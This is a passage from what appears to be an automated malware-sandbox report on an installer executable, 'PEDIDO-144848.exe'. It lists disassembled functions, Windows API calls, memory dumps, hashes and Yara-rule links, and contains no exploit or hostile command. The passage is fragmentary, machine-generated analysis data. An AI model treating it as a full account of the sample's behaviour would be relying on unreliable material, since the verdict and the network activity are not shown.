                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID: @y$Rse Setup
                                                        • API String ID: 184305955-1867395490
                                                        • Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                        • Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
                                                        • Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                        • Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
                                                        Function 004040CE Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404159
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040418B
                                                        • GetSysColor.USER32(?), ref: 0040419C
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
                                                        • lstrlenA.KERNEL32(?), ref: 004041BD
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404243
                                                        • SendMessageA.USER32(00000000), ref: 00404246
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404271
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
                                                        • SetCursor.USER32(00000000), ref: 004042C9
                                                        • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,?), ref: 004042DC
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
                                                        • SetCursor.USER32(00000000), ref: 004042EC
                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404318
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: Call$N$open
                                                        • API String ID: 3615053054-2563687911
                                                        • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                        • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                        • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                        • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
                                                        Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,Rse Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$Rse Setup
                                                        • API String ID: 941294808-2439763508
                                                        • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                        • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                        • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                        • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                        Function 00405AE9 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405C7C,?,?), ref: 00405B1C
                                                        • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
                                                          • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                          • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                        • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
                                                        • wsprintfA.USER32 ref: 00405B60
                                                        • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                        • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405C49
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
                                                          • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                          • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 222337774-4148678300
                                                        • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                        • Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
                                                        • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                        • Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
                                                        Function 0040600B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                        • CharPrevA.USER32(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00406047
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
                                                        • *?|<>/":, xrefs: 00406053
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-407276050
                                                        • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                        • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                        • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                        • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
                                                        Function 00402C13 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C2E
                                                        • MulDiv.KERNEL32(00094B7B,00000064,00096110), ref: 00402C59
                                                        • wsprintfA.USER32 ref: 00402C69
                                                        • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%${K
                                                        • API String ID: 1451636040-3453463094
                                                        • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                        • Instruction ID: 21607a1dc9e24acd8111b7ab95824f47c5a1c8f1a2671c4e1062bfa223269d08
                                                        • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                        • Instruction Fuzzy Hash: 8B014F70944209FBEF209F60DD4AEAE37A9AB04304F008039FA16A92D0D7B89951CB59
                                                        Function 00403FEC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404009
                                                        • GetSysColor.USER32(00000000), ref: 00404025
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404031
                                                        • SetBkMode.GDI32(?,?), ref: 0040403D
                                                        • GetSysColor.USER32(?), ref: 00404050
                                                        • SetBkColor.GDI32(?,?), ref: 00404060
                                                        • DeleteObject.GDI32(?), ref: 0040407A
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404084
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
                                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
                                                        Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                          • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                        • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                        • String ID:
                                                        • API String ID: 3730416702-0
                                                        • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                        • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                        • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                        • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                        Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        • GlobalFree.KERNEL32(?), ref: 100024B5
                                                        • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                        • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                        • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                        • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                        Function 00404FB9 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                        • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                        • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                        • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
